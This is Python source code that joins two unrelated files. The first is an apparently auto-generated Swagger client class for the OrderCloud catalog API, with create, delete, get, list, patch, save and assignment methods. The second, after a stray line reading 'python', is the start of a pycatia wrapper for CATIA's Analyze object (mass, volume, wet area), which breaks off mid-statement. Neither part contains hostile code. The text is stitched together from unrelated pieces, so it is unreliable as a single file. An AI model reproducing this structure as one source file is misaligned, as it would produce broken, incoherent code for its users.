# coding: utf-8 """ OrderCloud No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) OpenAPI spec version: 1.0 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class CatalogApi(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def create(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_with_http_info(catalog, **kwargs) else: (data) = self.create_with_http_info(catalog, **kwargs) return data def create_with_http_info(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_with_http_info(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog' is set if ('catalog' not in params) or (params['catalog'] is None): raise ValueError("Missing the required parameter `catalog` when calling `create`") resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog' in params: body_params = params['catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_with_http_info(catalog_id, **kwargs) else: (data) = self.delete_with_http_info(catalog_id, **kwargs) return data def delete_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_assignment(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) else: (data) = self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) return data def delete_assignment_with_http_info(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment_with_http_info(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'buyer_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_assignment`") # verify the required parameter 'buyer_id' is set if ('buyer_id' not in params) or (params['buyer_id'] is None): raise ValueError("Missing the required parameter `buyer_id` when calling `delete_assignment`") resource_path = '/catalogs/{catalogID}/assignments'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} if 'buyer_id' in params: query_params['buyerID'] = params['buyer_id'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_product_assignment(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) else: (data) = self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) return data def delete_product_assignment_with_http_info(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment_with_http_info(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'product_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_product_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_product_assignment`") # verify the required parameter 'product_id' is set if ('product_id' not in params) or (params['product_id'] is None): raise ValueError("Missing the required parameter `product_id` when calling `delete_product_assignment`") resource_path = '/catalogs/{catalogID}/productassignments/{productID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] if 'product_id' in params: path_params['productID'] = params['product_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_with_http_info(catalog_id, **kwargs) else: (data) = self.get_with_http_info(catalog_id, **kwargs) return data def get_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `get`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. :param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_with_http_info(**kwargs) else: (data) = self.list_with_http_info(**kwargs) return data def list_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. :param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. """ all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size', 'filters'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} if 'search' in params: query_params['search'] = params['search'] if 'search_on' in params: query_params['searchOn'] = params['search_on'] if 'sort_by' in params: query_params['sortBy'] = params['sort_by'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] if 'filters' in params: query_params['filters'] = params['filters'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListCatalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list_assignments(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_assignments(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str buyer_id: ID of the buyer. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListCatalogAssignment If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_assignments_with_http_info(**kwargs) else: (data) = self.list_assignments_with_http_info(**kwargs) return data def list_assignments_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_assignments_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str buyer_id: ID of the buyer. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListCatalogAssignment If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'buyer_id', 'page', 'page_size'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_assignments" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs/assignments'.replace('{format}', 'json') path_params = {} query_params = {} if 'catalog_id' in params: query_params['catalogID'] = params['catalog_id'] if 'buyer_id' in params: query_params['buyerID'] = params['buyer_id'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListCatalogAssignment', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list_product_assignments(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_product_assignments(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str product_id: ID of the product. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListProductCatalogAssignment If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_product_assignments_with_http_info(**kwargs) else: (data) = self.list_product_assignments_with_http_info(**kwargs) return data def list_product_assignments_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_product_assignments_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str product_id: ID of the product. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListProductCatalogAssignment If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'product_id', 'page', 'page_size'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_product_assignments" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs/productassignments'.replace('{format}', 'json') path_params = {} query_params = {} if 'catalog_id' in params: query_params['catalogID'] = params['catalog_id'] if 'product_id' in params: query_params['productID'] = params['product_id'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListProductCatalogAssignment', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def patch(self, catalog_id, partial_catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.patch(catalog_id, partial_catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog partial_catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.patch_with_http_info(catalog_id, partial_catalog, **kwargs) else: (data) = self.patch_with_http_info(catalog_id, partial_catalog, **kwargs) return data def patch_with_http_info(self, catalog_id, partial_catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.patch_with_http_info(catalog_id, partial_catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog partial_catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'partial_catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method patch" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `patch`") # verify the required parameter 'partial_catalog' is set if ('partial_catalog' not in params) or (params['partial_catalog'] is None): raise ValueError("Missing the required parameter `partial_catalog` when calling `patch`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'partial_catalog' in params: body_params = params['partial_catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'PATCH', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save(self, catalog_id, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save(catalog_id, catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_with_http_info(catalog_id, catalog, **kwargs) else: (data) = self.save_with_http_info(catalog_id, catalog, **kwargs) return data def save_with_http_info(self, catalog_id, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_with_http_info(catalog_id, catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `save`") # verify the required parameter 'catalog' is set if ('catalog' not in params) or (params['catalog'] is None): raise ValueError("Missing the required parameter `catalog` when calling `save`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog' in params: body_params = params['catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save_assignment(self, catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_assignment(catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param CatalogAssignment catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_assignment_with_http_info(catalog_assignment, **kwargs) else: (data) = self.save_assignment_with_http_info(catalog_assignment, **kwargs) return data def save_assignment_with_http_info(self, catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_assignment_with_http_info(catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param CatalogAssignment catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_assignment'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_assignment' is set if ('catalog_assignment' not in params) or (params['catalog_assignment'] is None): raise ValueError("Missing the required parameter `catalog_assignment` when calling `save_assignment`") resource_path = '/catalogs/assignments'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog_assignment' in params: body_params = params['catalog_assignment'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save_product_assignment(self, product_catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_product_assignment(product_catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param ProductCatalogAssignment product_catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs) else: (data) = self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs) return data def save_product_assignment_with_http_info(self, product_catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_product_assignment_with_http_info(product_catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param ProductCatalogAssignment product_catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['product_catalog_assignment'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save_product_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'product_catalog_assignment' is set if ('product_catalog_assignment' not in params) or (params['product_catalog_assignment'] is None): raise ValueError("Missing the required parameter `product_catalog_assignment` when calling `save_product_assignment`") resource_path = '/catalogs/productassignments'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'product_catalog_assignment' in params: body_params = params['product_catalog_assignment'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'))
python
#! usr/bin/python3.6 """ Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445 .. warning:: The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only. They are there as a guide as to how the visual basic / catscript functions work and thus help debugging in pycatia. """ from pycatia.system_interfaces.any_object import AnyObject from pycatia.system_interfaces.system_service import SystemService class Analyze(AnyObject): """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445) | System.IUnknown | System.IDispatch | System.CATBaseUnknown | System.CATBaseDispatch | System.AnyObject | Analyze | | Represents the analysis object associated with a product. """ def __init__(self, com_object): super().__init__(com_object) self.analyze = com_object @property def mass(self) -> float: """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445) | o Property Mass() As double (Read Only) | | Returns the product mass value. | | Example: | | This example retrieves MassValue from | | the Analyze object associated with myProduct: | | | MassValue = myProduct.Analyze.Mass :return: float :rtype: float """ return self.analyze.Mass @property def volume(self) -> float: """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445) | o Property Volume() As double (Read Only) | | Returns the product volume value. | | Example: | | This example retrieves VolumeValue from | | the Analyze object associated with myProduct: | | | VolumeValue = myProduct.Analyze.Volume :return: float :rtype: float """ return self.analyze.Volume @property def wet_area(self) -> float: """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445) | o Property WetArea() As double (Read Only) | | Returns the product wet area (outer volume). | | | Note: | This method uses mm2 instead of default Catia V5 unit. | | Example: | | This example retrieves WetAreaValue from | | the Analyze object associated with myProduct: | | | WetAreaValue = myProduct.Analyze.WetArea :return: float :rtype: float """ return 